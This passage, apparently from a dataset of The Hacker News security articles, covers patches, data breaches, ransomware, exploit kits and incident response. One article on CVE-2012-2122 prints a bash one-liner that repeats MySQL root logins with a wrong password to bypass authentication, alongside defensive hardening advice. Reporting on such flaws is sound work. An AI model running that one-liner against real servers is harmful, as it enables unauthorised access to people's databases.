online banking account. They made more than 150 fraudulent transactions for victim's accounts and Police said that, because Gang was operating from the Netherlands, so tracking them become possible. ",Malware Apple Releases dozens of Security Updates to Fix OS X and iOS Flaws,https://thehackernews.com/2015/07/apple-security-updates.html,"Apple has released updates to patch dozens of security vulnerabilities in iOS and OS X Yosemite operating system. The updates include iOS 8.4 version of the mobile operating system, OS X Yosemite 10.10.4 and Security Update 2015-005. iOS 8.4 Update The iOS 8.4 update includes patches for over 20 security vulnerabilities that could lead to remote code execution (RCE), application termination, the intercepted encrypted traffic, man-in-the-middle attacks and other problem. Certificate trust policy issues, buffer overflow vulnerabilities, apache compatibility issues, memory corruption flaws, and a host of WebKit, kernel, and CoreText vulnerabilities were also patched in the latest iOS update. OS X Yosemite 10.10.4 update The OS X Yosemite 10.10.4 update includes patches for QuickTime, ImageIO, and OpenSSL along with Remote Code Execution (RCE) flaws and other issues that may allow attackers to gain elevated privileges or crash applications. The Safari 8.0.7 update patches four vulnerabilities in the WebKit browser engine that could allow an attacker to remotely execute code, view WebSQL databases, steal account information and pilfer cookie information from a targeted Mac. Logjam Issue Resolved The iPad and iPhone update also addresses the Logjam flaw, a cryptographic weakness in algorithms used by the ""Diffie-Hellman key exchange"" that allows protocols like HTTPS, SSH, SMTPS, IPsec to negotiate a secret key and create secure communication channels. Mac owners are recommended to grab the OS X Yosemite version 10.10.4 and the latest Security Update 2015-005 now. It advisory details the same patches for many issues present in iOS as well as many additional vulnerabilities. Update Now Mac OS X users can download and install the updates through the Software Update tool. iPhone and iPad users can grab the update through the ""General"" tab in the Settings app and then click the Software Update tab to continue. ",Vulnerability Marriott Faces $123 Million GDPR Fine Over Starwood Data Breach,https://thehackernews.com/2019/07/marriott-data-breach-gdpr.html,"After fining British Airways with a record fine of £183 million earlier this week, the UK's data privacy regulator is now planning to slap world's biggest hotel chain Marriott International with a £99 million ($123 million) fine under GDPR over 2014 data breach. This is the second major penalty notice in the last two days that hit companies for failing to protect its customers' personal and financial information compromised and implement adequate security measures. In November 2018, Marriott discovered that unknown hackers compromised their guest reservation database through its Starwood hotels subsidiary and walked away with personal details of approximately 339 million guests. The compromised database leaked guests' names, mailing addresses, phone numbers, email addresses, dates of birth, gender, arrival and departure information, reservation date, and communication preferences. The breach, which likely happened in 2014, also exposed unencrypted passport numbers for at least 5 million users and credit card records of eight million customers. According to the Information Commissioner's Office (ICO), nearly 30 million residents of 31 countries in the European and 7 million UK residents were impacted by the Marriott data breach. The ICO's investigation found that Marriott failed to undertake sufficient due diligence when it bought Starwood and should also have done more to secure its systems. Last year, the General Data Protection Regulation (GDPR) was introduced in Europe that forces companies to make sure the way they collect, process, and store data are safe. ""The GDPR makes it clear that organizations must be accountable for the personal data they hold. This can include carrying out proper due diligence when making a corporate acquisition, and putting in place proper accountability measures to assess not only what personal data has been acquired, but also how it is protected,"" Information Commissioner Elizabeth Denham said. ""Personal data has real value so organizations have a legal duty to ensure its security, just like they would do with any other asset. If that doesn't happen, we will not hesitate to take strong action when necessary to protect the rights of the public."" Marriott International's president Arne Sorenson said the company was ""disappointed"" with the ICO's announcement and would contest the fine. ",Cyber_Attack CVE-2012-2122 : Serious Mysql Authentication Bypass Vulnerability,https://thehackernews.com/2012/06/cve-2012-2122-serious-mysql.html,"CVE-2012-2122 : Serious Mysql Authentication Bypass Vulnerability A serious security bug in MariaDB and MySQL Disclosed, According to Advisory All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable. This issue got assigned an id CVE-2012-2122. ""When a user connects to MariaDB/MySQL, a token (SHAover a password and a random scramble string) is calculated and comparedwith the expected value. Because of incorrect casting, it might'vehappened that the token and the expected value were considered equal,even if the memcmp() returned a non-zero value. In this caseMySQL/MariaDB would think that the password is correct, even while it isnot. Because the protocol uses random strings, the probability ofhitting this bug is about 1/256."" ""Which means, if one knows a user name to connect (and ""root"" almostalways exists), she can connect using *any* password by repeatingconnection attempts. ~300 attempts takes only a fraction of second, sobasically account password protection is as good as nonexistent.Any client will do, there's no need for a special libmysqlclient library."" The following one-liner in bash will provide access to an affected MySQL server as the root user account, without actually knowing the password. $ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done mysql> Defense: The first rule of securing MySQL is to not expose to the network at large in the first place. Most Linux distributions bind the MySQL daemon to localhost, preventing remote access to the service. In cases where network access must be provided, MySQL also provides host-based access controls. There are few use cases where the MySQL daemon should be intentionally exposed to the wider network and without any form of host-based access control. the easiest thing to do is to modify the my.cnf file in order to restrict access to the local system. Open my.cnf with the editor of your choice, find the section labeled [mysqld] and change (or add a new line to set) the ""bind-address"" parameter to ""127.0.0.1"". Restart the MySQL service to apply this setting. Note: Download The Latest Exploits for CVE-2012-2122 From our TOOLS YARD section. ",Vulnerability Facebook Finds 'No Evidence' Hackers Accessed Connected Third-Party Apps,https://thehackernews.com/2018/10/facebook-token-hacking.html,"When Facebook last weekend disclosed a massive data breach—that compromised access tokens for more than 50 million accounts—many feared that the stolen tokens could have been used to access other third-party services, including Instagram and Tinder, through Facebook login. Good news is that Facebook found no evidence ""so far"" that proves such claims. In a blog post published Tuesday, Facebook security VP Guy Rosen revealed that investigators ""found no evidence"" of hackers accessing third-party apps with its ""Login with Facebook"" feature. ""We have now analyzed our logs for all third-party apps installed or logged in during the attack we discovered last week. That investigation has so far found no evidence that the attackers accessed any apps using Facebook Login,"" Rosen says. This does not mean that the stolen access tokens that had already been revoked by Facebook do not pose any threat to thousands of third-party services using Facebook Login, as the company explains it depends upon how websites validate their users access tokens. Many websites that do not use Facebook's official SDKs to regularly validate their users access tokens could still allow attackers to access users' accounts using revoked access tokens. In order to help such websites, Facebook is building a tool that will enable developers to ""manually identify the users of their apps who may have been affected, so that they can log them out."" ""Any developer using our official Facebook SDKs — and all those that have regularly checked the validity of their users' access tokens – were automatically protected when we reset people's access tokens,"" Rosen says. While announcing its worst-ever data breach last week, Facebook said unknown hackers had exploited a chain of vulnerabilities in its code to steal 50 million accounts tokens—digital keys that keep users logged in, so they don't need to re-enter their credentials every time they use the app. The social media giant fixed the issue on Thursday night and forcefully logged 90 million users out of their accounts as a precaution by resetting their access tokens. Even after Facebook announced that it found no evidence of hackers accessing third-party services that use Facebook's single sign-on in the massive attack, some of those services are taking necessary steps to safeguard their users. For example, Uber has precautionarily expired all active Facebook-based login sessions temporarily after the data breach, while the company is still investigating the breach at its end. The social media giant has yet to disclose the attackers responsible for the massive attack, their origins, and the data they may have stolen from the affected 50 million Facebook users. The Irish Data Protection Commission said that less than 10 percent of the 50 million users (which equals to five million users) attacked in the breach are based in the European Union (EU), where Facebook can be fined up to $1.63 billion under the nation's General Data Protection Regulation (GDPR) if it did not find doing enough to protect the security of users. ",Cyber_Attack BlackBerry Enterprise Server vulnerable to malicious image file,https://thehackernews.com/2011/08/blackberry-enterprise-server-vulnerable.html,"BlackBerry Enterprise Server vulnerable to malicious image file There are remotely and easily exploitable vulnerabilities in the BlackBerry Enterprise Server that could allow an attacker to gain access to the server by simply sending a malicious image file to a user's BlackBerry device. The vulnerabilities are in several version of BES for Exchange, Lotus Domino and Novell GroupWise, and Research in Motion said that an attacker who is able to exploit one of the bugs might also be able to move from the compromised BES server to other parts of the network. The company has issued a patch for the BES flaws and says that they are at the top of the severity scale in terms of exploitability. The vulnerability in both the BlackBerry MDS Connection Service and the BlackBerry Messaging Agent is related to the way that the components handle PNG and TIFF image files. Exploiting the vulnerabilities can be as easy as sending a malicious PNG or TIFF file to a BlackBerry user. In some scenarios, the user wouldn't even need to open the email or click on a link in order to complete the attack. ""Successful exploitation of any of these vulnerabilities might allow an attacker to gain access to and execute code on the BlackBerry Enterprise Server. Depending on the privileges available to the configured BlackBerry Enterprise Server service account, the attacker might also be able to extend access to other non-segmented parts of the network,"" RIM said in its advisory. [Source] ",Vulnerability 540 Million Facebook User Records Found On Unprotected Amazon Servers,https://thehackernews.com/2019/04/facebook-app-database.html,"It's been a bad week for Facebook users. First, the social media company was caught asking some of its new users to share passwords for their registered email accounts and now… ...the bad week gets worse with a new privacy breach. More than half a billion records of millions of Facebook users have been found exposed on unprotected Amazon cloud servers. The exposed datasets do not directly come from Facebook; instead, they were collected and unsecurely stored online by third-party Facebook app developers. Researchers at the cybersecurity firm UpGuard today revealed that they discovered two datasets—one from a Mexican media company called Cultura Colectiva and another from a Facebook-integrated app called ""At the pool""—both left publicly accessible on the Internet. More than 146 GB of data collected by Cultura Colectiva contains over 540 million Facebook user records, including comments, likes, reactions, account names, Facebook user IDs, and more. The second dataset belonging to ""At the Pool"" app contains information about users' friends, likes, groups, and checked-in locations, as well as ""names, plaintext passwords and email addresses for 22,000 people."" Though UpGuard believes the plaintext passwords found in the database were for the At the Pool app, and not for users' Facebook accounts, given the fact that people frequently re-use the same passwords for multiple apps, many of the leaked passwords could be used to access Facebook accounts. ""As Facebook faces scrutiny over its data stewardship practices, they have made efforts to reduce third-party access. But as these exposures show, the data genie cannot be put back in the bottle. Data about Facebook users have been spread far beyond the bounds of what Facebook can control today,"" experts at UpGuard said. Both datasets were stored in unsecured Amazon S3 buckets, which have now been secured and taken offline after Upguard, Facebook and media contacted Amazon. This is not the first time third-party companies have collected or misused Facebook data and sometimes leaked it to the public. The most famous incident is the Cambridge Analytica scandal wherein the political data firm improperly gathered and misused data on 87 million users through a seemingly innocuous quiz app, for which the social media giant is facing £500,000 EU fine. Though Facebook has since then tightened up its privacy controls ensuring apps use their access appropriately, the social media company is still facing intense pressure and criticism for not doing enough to offer better privacy and security to its 2.3 billion users. ",Data_Breaches Firefox 17 Beta Released with Click-to-Play Plugins for blocking vulnerable Plugins,https://thehackernews.com/2012/10/firefox-17-beta-released-with-click-to.html,"Last week, Mozilla announced it will prompt Firefox users on Windows with old versions of Adobe Reader, Adobe Flash, and Microsoft Silverlight, but refused to detail how the system will work. Finally today Firefox 17 is now in beta and with it is a very cool feature, click-to-play plugins. When a user lands on a site that requires the use of a plugin, say Adobe Flash, if the version running in the user's browser is on the list of known vulnerable applications, Mozilla will disable it and show the user a message saying that she needs to update the plugin. ""By combining the safety of the blocklist with the flexibility of click-to-play, we now have an even more effective method of dealing with vulnerable or out-of-date plugins."" Mozilla wrote on blog. Mozilla is still working on implementing the controls, which would allow you to block all plugins by default and then pick where you want them to run. As already mentioned, this feature will be enabled by default in Firefox 17. There is, however, an about:config preference ""plugins.click_to_play"" that can be set to true to enable click-to-play for all plugins, not just out-of-date ones. Mozilla says it is still developing this part. The main motivation behind this plugin is to prevent users' systems against drive-by attacks that target vulnerable plugins. Subscribe to our Daily News-letter via email - Be First to know about Security and Hackers. ",Vulnerability FBI Suggests Ransomware Victims — 'Just Pay the Ransom Money',https://thehackernews.com/2015/10/fbi-ransomware-malware.html,"Your Headache is not my Problem. If your computer gets hacked and infected with malware that holds your data for ransom, just pay off the criminals to see your valuable data again and do not expect the FBI to save them – it's what the FBI is advising concerning ransomware. Ransomware is a sophisticated malicious software that lets hacker encrypts all the contents of a victim's hard drive or/and server and demands ransom (typically in Bitcoins) for the decrypt key. Also Read: Free Ransomware Decryption and Malware Removal ToolKit Federal agencies and the FBI have long urged people not to pay ransom to the criminals, as there is no guarantee that they will even receive an unlock key. The FBI – 'Better Pay up the Ransom' However, while speaking at the 2015 Cyber Security Summit on Wednesday, Assistant Special Agent Joseph Bonavolonta, who oversees the FBI's Boston office, advised the companies infected with ransomware to better pay up the ransom, according to a recent report by Security Ledger. ""The ransomware is that good,"" said Bonavolonta. ""To be honest, we often advise people just to pay the ransom."" So, is the FBI now sure that Paying Ransom would save the victim's data? Malicious programs such as Cryptolocker, Cryptowall, and Reveton uses ""ultra secure"" encryption algorithms to encrypt victims' data, and the key to decrypt data can cost victims from $200 to $10,000. However, even after paying this much of amount, there is no guarantee that victims will receive the key to recovering their data. Even the police are not immune to Ransomware attacks. Cryptowall – currently the most widespread malware used – alone made criminal hackers over 18 Million in dollars from April 2014 to June 2015. Due to the success of ransomware on such a vast scale, Bonavolonta said hackers are likely to keep their ransom demands low in an attempt to maximize profit. For this reason, they are mostly honest, he said, adding, ""You do get your access back."" Also Read: Anyone can Now Create their Own Ransomware using This Hacking ToolKit This advice from the FBI agent counters many public advisories on the ransomware. Also, not everyone would agree with what Bonavolonta advised because fulfilling demands of bad guys is equivalent to encouraging their bad practices. Prevention is the Best Practice As I previously recommended, the best defense measure against Ransomware is creating awareness within the organizations, as well as maintaining backups that are rotated regularly. Most viruses are introduced by opening infected attachments or clicking on links to malware usually contained in spam emails. So, DO NOT CLICK on links provided in emails and attachments from unknown sources. Also Read: Ransomware Attacks Threaten Wearable Devices and Internet of Things Moreover, ensure that your systems are running the latest version of Antivirus software with up to date malware definitions. ",Malware THN Weekly Roundup — 15 Most Popular Cyber Security and Hacking News Stories,https://thehackernews.com/2015/09/hackernews-popular-updates.html,"We are once again here with our weekly round up based on last week's top cyber security threats and challenges. I recommend you to read the entire thing (just click 'Read More' because there's some valuable advice in there as well). Here's the list: 1. Reminder! If You have not yet, Turn Off Windows 10 Keylogger Now Microsoft is very powerful in tracking every single word you type or say to its digital assistant Cortana using its newest Windows 10 operating system. The keylogger that Microsoft put in the Technical Preview of Windows 10 last fall made its way to Windows 10 Free public release first rolled out back in July. Besides various Windows 10 privacy issues, there is a software component that is a bit more complicated than you thought. It tracks your inputs using: Keyboard Voice Screen Mouse Stylus Information about your Calendar and Contacts If this keylogger, which is more than just a keylogger, makes you feel creepy then need not to worry, because the good news is — You can Turn Off this Keylogger. For detailed information and to know how You can Turn Off this Keylogger – Read more. 2. 200 Million WhatsApp Users Vulnerable to vCard Vulnerability A dangerous security vulnerability discovered in Whatsapp last week affected 200 Million WhatsApp Web users. The web-based extension of WhatsApp was found vulnerable to a vCard exploit that could have allowed hackers to trick users into installing malware on their computers including: Remote Access Tools (RATs) Ransomware Bots Other malicious software Here's How the WhatsApp Exploit Works – Read more. 3. 11 Million Ashley Madison Passwords Cracked In Just 10 Days Last month, Ashley Madison hackers leaked about 100 GB of sensitive data belonging to the popular extramarital affair website 'Ashley Madison', which includes the source code of company's website, users' details, and hashed passwords. However, the Password Cracking Team 'CynoSure Prime' has cracked more than 11 Million user passwords within ten days. Moreover, a member of the team shared the same list of passwords online, and the calculations were terrible. The top 5 most used passwords by Ashley Madison customers were: 123456 12345 password DEFAULT and 123456789. For more in-depth information – Read more. 4. Microsoft is Auto-Downloading Windows 10 to PCs without your Knowledge, But Here's How to Stop Microsoft is auto-downloading Windows 10 installation files — up to 6GB — onto users' PCs even if the users have not opted into the upgrade. The company has dropped and saved a hidden $Windows.~BT folder on your computer's primary (C) drive, if you are running Windows 7 or Windows 8.1. Doing so, Microsoft is not only consuming your device storage space but also stealing your Internet bandwidth for large unrequested files, i.e., up to 6 gigabytes. Until the company provides some official fix to this issue, here are some methods that you can use to stop Microsoft from auto-downloading Windows 10 installation files onto your PCs. 5. Samsung Launches 6GB RAM Chips for Next-Generation Smartphones Samsung was the first one to bring 4GB RAM access in the Android mobile phones with the launch of Galaxy S6 and Galaxy S6 Edge, and now… …the company has again taken a step further with the launch of 12GB LPDDR4 (low power, double data rate 4) DRAM Chip to offer 6GB RAM for its Next Generation Smartphones and tablets. The next generation mobile devices are supposed to be equipped with new mobile DRAM chip to enable increased capacity and fastest speed; simultaneously providing essentials including: Excellent energy efficiency Reliability Smooth multitasking Ease of design Better performance with the compatible operating system For more information – Read more. 6. Russian Hackers Hijack Satellite To Steal Data from Thousands of Hacked Computers Turla APT (Advanced Persistent Threat), a group of Russian hackers, is hijacking commercial satellites to hide its command-and-control operations. Turla is a sophisticated Russian cyber-espionage group, believed to be sponsored by the Russian government, with a number of high-profile targets including: government military embassy research, and pharmaceutical organizations... ...from over 45 countries, such as China, Vietnam, and the United States. The group is now taking advantage of the fact that older satellites orbiting around the Earth do not come with support for encrypted connections and rely on unsuspecting users of the satellite Internet service providers across the world. – Read more. 7. How to Remove KeyRaider Malware that Hacked Over 225,000 iOS Devices At the end of last month, security researchers discovered an iPhone malware, dubbed ""KeyRaider,"" that stole more than 225,000 credentials from jailbroken Apple devices. KeyRaider, as the malware raids victims' username and passwords, private keys, and certificates, is spreading via the popular Cydia app repositories and is capable of performing: Ransomware Attacks Data Theft DDoS Attacks However, jailbreak users may implement some measures to mitigate the risk of KeyRaider malware. Here's Steps to Remove KeyRaider Malware – Read More. 8. Warning! Seagate Wireless Hard Drives Have a Secret Backdoor for Hackers Yes, you heard right. Security researchers uncovered an undocumented Telnet services with a hard-coded password in Seagate Wireless Hard Drives. The researchers found a vulnerability (CVE-2015-2874) with an inbuilt user account (default username and password — ""root"") that could have allowed an attacker to access the device remotely, leaving users' data vulnerable to theft. Affected devices include: Seagate Wireless Plus Mobile Storage Seagate Wireless Mobile Storage (Wirelessly streaming your tablet and smartphone's data) LaCie FUEL (Wirelessly extending storage for iPads) Fortunately, there's an easy fix. For patch and more information – Read more. 9. China Police Arrest 15,000 Suspects for Alleged Cyber Crimes As part of its six-month long operation dubbed ""Cleaning the Internet,"" China Police arrested nearly 15,000 people on suspicion of cyber crimes last month. Besides the arrest of around 15,000 suspects, Police also suspended more than 190,000 illegal online websites featuring vulgar contents including advertisements for pornography, firearms, explosives, and gambling. – Read More. 10. Android Stagefright Exploit Code Released Zimperium team finally released the CVE-2015-1538 Stagefright Exploit to the public, demonstrating the process of Remote Code Execution (RCE). The Stagefright vulnerability allows a hacker to reveal victim's information by injecting malicious code remotely, even without any involvements of the victim. The purpose of the public release of the exploit code is to put penetration testers and security researchers to test and check the code and analyze the results. 11. Ashley Madison's Parent Company Secretly Running Online Escort Services Avid Life Media, the company that owns Ashley Madison, was secretly running an Online Escort Service, leaked documents revealed last week. An internal memo leaked by the Ashley Madison hackers revealed that Avid Life was running an Escorts.ca website that was similar to other online escort services. Besides running Escorts.ca, Avid Life Media was actively recruiting escorts for another website it owned, called ""Arrangement Finders"" – ""sugar daddy"" website with tagline is ""Intimacy with a Twi$t."" – Read more. 12. URRGH! Evil app Watches YOU WATCHING PORN and takes your snaps Watching Porn? Maybe the porn app you have installed on your Android smartphone could be taking your snaps to blackmail you for money. Security researchers has uncovered an Android pornography application called Adult Player that promises free pornographic videos, but actually is taking your photographs to extort you for $500 (£330) ransom – a whole new way of Cyber Extortion. For detailed information and know how to get rid of this Android Ransomware app – Read more. 13. Contactless Fingerprint Scanner Captures Your Prints from Meters Away We all are aware of Fingerprint Biometric Readers that requires our touch to authenticate our identity to be authorized. However, the latest research conducted by the National Institute of Standards and Technology (NIST) indicates that the future of fingerprint scanners lies in a ""no-touch"" activity by an individual for gaining authorization. The Contactless Fingerprint Scanners, dubbed 'fast-capture non-contact' devices as NIST calls it, is capable of sensing and reading your fingerprint information while you are standing few meters away from the scanner. For more in-depth information – Read more. 14. Microsoft Releases 12 Security Updates In this month's Tuesday Patch Update, Microsoft addressed a total of 56 vulnerabilities in its different products. The updates included five critical, out of which two of them addressed vulnerabilities in all versions of Windows. For detailed information on each and every update and their security patches – Read more. 15. How to Track Stolen Devices using Mac Addresses An Iowa police officer David Schwindt has developed a sniffing software, dubbed L8NT (short for Latent analysis of 802.11 Network Traffic), that helps police find more stolen properties. L8NT is a specialized wireless dongle with an antenna that scans for and locates MAC addresses associated with the known stolen devices. For detailed information on working of L8NT – Read more. ",Malware Beware of New Celebrity Sex Tape (Scam) Leaked on Facebook!,https://thehackernews.com/2016/12/facebook-scam-malware.html,"If you came across a celebrity sex video on Facebook featuring Jessica Alba or any other celebrity, just avoid clicking it. Another Facebook scam is circulating across the social networking website that attempts to trick Facebook users into clicking on a link for a celebrity sex tape that instead downloads malware onto their computers. Once installed, the malware would force web browsers to display aggressive advertising web pages which include sites with nudity and fake lotteries. The spam campaign was uncovered by researchers at Cyren, who noted that a malicious Google Chrome extension is spreading nude celebrity PDFs through private messages and posts on various Facebook groups. If opened, the PDF file takes victims to a web page with an image containing a play button, tricking users that the PDF may contain a video. Once clicked, the link redirects users of Internet Explorer, Firefox, or Safari to a web page with overly-aggressive popups and advertisements related to nudity and fake lottery. But on the other hand, this celebrity sex tape scam makes the matter worse for Google Chrome users. The Scam is Fatal for Google Chrome Users Once clicked on the scam link, Chrome desktop users are redirected to a fake YouTube page that leads up a pop-up window inviting victims to install a Google Chrome extension to view the videos. Once victims get to install the malicious extension, the browser directs users to the Facebook.com login page and prompt them to re-authenticate, allowing attackers to collect Facebook users' credentials and then use their accounts to spread the malicious campaign further. When analyzed the Chrome extension's source code, the Cyren team discovered that the extension comes with support for monitoring and intercepting web traffic in real-time, to determine what users can access through their browsers. The malicious Chrome extension contains a long list of Antivirus and AntiSpam domains that it blocks and prevents the user from opening. Besides this, the malicious Chrome extension also prevents victims from accessing the Chrome Extensions settings page, so that victims can not disable the malicious add-on. ""It also blocks the chrome extensions and chrome devtools tabs from being opened, preventing the user from uninstalling the malicious Chrome extension,"" the researchers say. The PDF uploaded to Facebook is generated by selecting the name of a celebrity randomly from the script file and combining the selected name with random characters. The name of celebrities includes Selena Gomez, Jessica Alba, Jennifer Lawrence, Hilary Duff, Paris Hilton, Rihanna, Kim Kardashian, Scarlett Johansson, Kelly Brook, Doutzen Kroes, Elodie Varlet and Nicki Minaj. According to Cyren researchers, the cyber criminals behind this malicious spam campaign managed to upload their extension to the Chrome Web Store, though the extension has since been removed by the Google's security team. How to remove the Malicious Chrome Extension? To remove this malicious extension, the infected users would first have to delete the Registry key from the Registry Editor. To do this, Go to Start Button → Type ""regedit"" in the Search/Run option, which will open the Windows Registry Editor. Now, use the side menu in the new window to find the folder below, right-click it and select ""Remove."" This is the path to the Registry Editor: HKEY_LOCAL_MACHINE\Software\Google\Chrome\Extension Now the second step is to remove the extension from the browser. Since the malicious Chrome extension prevents victims from accessing the native Chrome Extensions settings page, one must remove the extension by deleting the following folder from one's PC. C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions This action will remove all Chrome extensions from your computer. You have no option other than deleting the folder completely to get rid of the malicious threat, as you can not access the Chrome Extensions settings page to get the ID of the malicious extension. Last but not the least, no celebrity recently have had their sex tape leaked (at least not one that's available online). So if you come across any link claiming to show a leaked sex tape of Jessica Alba, Jennifer Lawrence or any other, remember just to report it. ",Malware SolarWinds Hack — New Evidence Suggests Potential Links to Chinese Hackers,https://thehackernews.com/2021/03/solarwinds-hack-new-evidence-suggests.html,"A malicious web shell deployed on Windows systems by leveraging a previously undisclosed zero-day in SolarWinds' Orion network monitoring software may have been the work of a possible Chinese threat group. In a report published by Secureworks on Monday, the cybersecurity firm attributed the intrusions to a threat actor it calls Spiral. Back on December 22, 2020, Microsoft disclosed that a second espionage group may have been abusing the IT infrastructure provider's Orion software to drop a persistent backdoor called Supernova on target systems. The findings were also corroborated by cybersecurity firms Palo Alto Networks' Unit 42 threat intelligence team and GuidePoint Security, both of whom described Supernova as a .NET web shell implemented by modifying an ""app_web_logoimagehandler.ashx.b6031896.dll"" module of the SolarWinds Orion application. The alterations were made possible not by breaching the SolarWinds app update infrastructure but instead by leveraging an authentication bypass vulnerability in the Orion API tracked as CVE-2020-10148, in turn allowing a remote attacker to execute unauthenticated API commands. ""Unlike Solorigate [aka Sunburst], this malicious DLL does not have a digital signature, which suggests that this may be unrelated to the supply chain compromise,"" Microsoft had noted. While the Sunburst campaign has since been formally linked to Russia, the origins of Supernova remained a mystery until now. According to Secureworks Counter Threat Unit (CTU) researchers — who discovered the malware in November 2020 while responding to a hack in one of its customers' networks — ""the immediate and targeted nature of the lateral movement suggests that Spiral had prior knowledge of the network."" During the course of further investigation, the firm said it found similarities between the incident and that of a prior intrusion activity on the same network uncovered in August 2020, which had been accomplished by exploiting a vulnerability in a product known as ManageEngine ServiceDesk as early as 2018. ""CTU researchers were initially unable to attribute the August activity to any known threat groups,"" the researchers said. ""However, the following similarities to the Spiral intrusion in late 2020 suggest that the Spiral threat group was responsible for both intrusions."" The connection to China stems from the fact that attacks targeting ManageEngine servers have long been associated with threat groups located in the country, not to mention the modus operandi of exploiting long-term persistence to collect credentials, exfiltrate sensitive data, and plunder intellectual property. But more solid evidence arrived in the form of an IP address that geolocated to China, which the researchers said came from a host that was used by the attackers to run Secureworks's endpoint detection and response (EDR) software for reasons best known to the threat actor, suggesting the software may have been stolen from the compromised customer. ""The threat group likely downloaded the endpoint agent installer from the network and executed it on the attacker-managed infrastructure,"" the researchers detailed. ""The exposure of the IP address was likely unintentional, so its geolocation supports the hypothesis that the Spiral threat group operates out of China."" It's worth pointing out that SolarWinds addressed Supernova in an update to Orion Platform released on December 23, 2020. ",Cyber_Attack Phoenix Exploit's Kit 2.8 mini version,https://thehackernews.com/2011/10/phoenix-exploits-kit-28-mini-version.html,"Phoenix Exploit's Kit 2.8 mini version Back in April of this year, we reported the leak of Phoenix Exploit Kit 2.5. The version currently in circulation is 2.8, and despite its lower activity for the last half of this year, it remains one of the preferred exploit packs used by cyber-criminals. In comparison to the Black Hole Exploit Pack, the PEK has a similar licensing model. The last version released offered an ""alternative"" to purchasing the exploit pack. This ""alternative"" is the Phoenix Exploit's Kit 2.8 mini. The current licensing model consists of the following: · Simple Domain (Closed) – USD $2,200.00 · Multithreaded Domain (Closed) – USD $2,700.00 · Extra-Encryption Service (ReFUDing) – USD $40.00 The mini version does not change the characteristics of the Exploit Pack, at least in regards to its graphical interface and functionality in relation to previous versions. Each section has the same type of display and statistical information, which is provided in a minimalistic yet concise manner. Although trivial, this is one of the main reasons for the adoption of Phoenix by cyber-criminals. The ability to easily locate information and merge the functionality of this Exploit Pack with a Malware Kit, such as SpyEye or ZeuS, increases their level of success and attack strategies. The main difference between the full version and the mini version is that the mini version is subject to a domain under the simple mode, while the full version allows multitasking. There isn't much new about the Exploit Pack. The code has been optimized to increase the success rate of exploitation and the exploit for Java Runtime Environment to Trusted has been added. Also removed were the following exploits pre-compiled in version 2.7: · Windows Help and Support Center Protocol Handler Vulnerability – CVE-2010-1885 · Integer overflow in the AVM2 abcFile parser in Adobe Flash Player – CVE-2009-1869 · Integer overflow in Adobe Flash Player 9 – CVE-2007-0071 · IEPeers Remote Code Execution – CVE-2009-0806 · Internet Explorer Recursive CSS Import Vulnerability – CVE-2010-3971 Although it's basically the same exploits (similar in all cases, including those incorporating other Exploit Packs in the wild), the author's optimized for each version. In this case, it includes the following exploits: · Microsoft Data Access Components (MDAC) - CVE-2006-0003 · Adobe Reader Javascript Printf Buffer Overflow - CVE-2008-2992 · Adobe Reader LibTiff - CVE-2010-0188 · Adobe Reader Collab GetIcon - CVE-2009-0927 · Java SMB - CVE-2010-0746 · Java Runtime Environment Trusted - CVE-2010-0840 · Java Skyline Plug-in component in Oracle Java SE and Java for Business 6 - CVE-2010-3552 · Java Deployment Toolkit Component - CVE-2010-0886 Despite the optimization of the components for each version, it is interesting that chain optimization and updating MDAC exploits remains the most prevalent, not only in this Exploit Pack but in any of the existing Exploit Packs. What is the reason? It comes down to a lack of experience by the users (application, customers around the basic procedures update) that transforms them into a potential target and highly susceptible through this old, but effective vulnerability. [Source] ",Vulnerability Adobe Releases First 2020 Patch Tuesday Software Updates,https://thehackernews.com/2020/01/adobe-software-updates.html,"Adobe today released software updates to patch a total of 9 new security vulnerabilities in two of its widely used applications, Adobe Experience Manager and Adobe Illustrator. It's the first Patch Tuesday for the year 2020 and one of the lightest patch releases in a long time for Adobe users. Moreover, none of the security vulnerabilities patched this month were either publicly disclosed or found being actively exploited in the wild. 5 of the 9 security vulnerabilities are 'critical' in severity, and all of them affect Adobe Illustrator CC versions 24.0 and earlier, which were reported to the company by Fortinet's FortiGuard Labs researcher Honggang Ren. According to an advisory published by Adobe, all five critical issues in Adobe Illustrator software are memory corruption bugs that could allow an attacker to execute arbitrary code on targeted systems in the context of the current user. The rest 4 security vulnerabilities affect Adobe Experience Manager—a comprehensive content management solution for building websites, mobile apps, and forms—none of which are critical in severity but should be patched at your earliest convenience. That's also because Adobe has marked security updates for Adobe Experience Manager with a priority rating of 2, which means similar flaws have previously been seen exploited in the wild, but for now, the company has found no evidence of any exploitation of these vulnerabilities in the wild. These reported issues—which include: reflected cross-site scripting, user interface injection, and expression language injection—affect multiple versions of Adobe Experience Manager, all leading to sensitive information disclosure, where three of them are important in severity and one moderate. Adobe today released Illustrator CC 2019 version 24.0.2 for Windows operating system and patches for Adobe Experience Manager versions 6.3, 6.4, and 6.5. Adobe recommends end-users and administrators to install the latest security updates as soon as possible to protect their systems and businesses from potential cyber-attacks. ",Vulnerability How to Build a Successful Incident Response Plan,https://thehackernews.com/2015/11/how-to-incident-response-plan.html,"The fight to protect your company's data isn't for the faint of heart. As an embattled IT warrior, with more systems, apps, and users to support than ever before, keeping everything up and running is a battle in itself. When it comes to preventing the worst-case scenario from happening, you need all the help you can get, despite your super-hero status. According to SANS, there are 6 key phases of an incident response plan. Preparation - Preparing users and IT to handle potential incidents in case they happen Identification - Figuring out what we mean by a ""security incident"" (which events can we ignore vs. which we must act on right now?) Containment - Isolating affected systems to prevent further damage Eradication - Finding and eliminating the root cause (removing affected systems from production) Recovery - Permitting affected systems back into the production environment (and watching them closely) Lessons Learned - Writing everything down and reviewing and analyzing with all team members so you can improve future incident response efforts Here are three examples from the front lines of incident response that can help you at each phase as you build out your plan. On Defining Success Incident Response Success There are many levels of success in defensive work… the common wisdom is that the attacker only has to be right once, but the defender has to be right every time, but that's not always true. Attacks are not all-or-nothing affairs - they happen over time, with multiple stages before final success. To remain undetected against an attentive defender, it is the attacker who must make every move correctly; if an astute defender detects them even once, they have the possibility to locate and stop the whole attack. You aren't going to immediately detect everything that happens during an attack - but as long as you detect (and correctly identify) enough of an attack to stop it in its tracks, that's success. Don't Panic. Stay Focused. Execution is key - the range of ways to attack a target can seem limitless - expecting to be an expert on all of them is pointlessly unrealistic. The most important part of incident 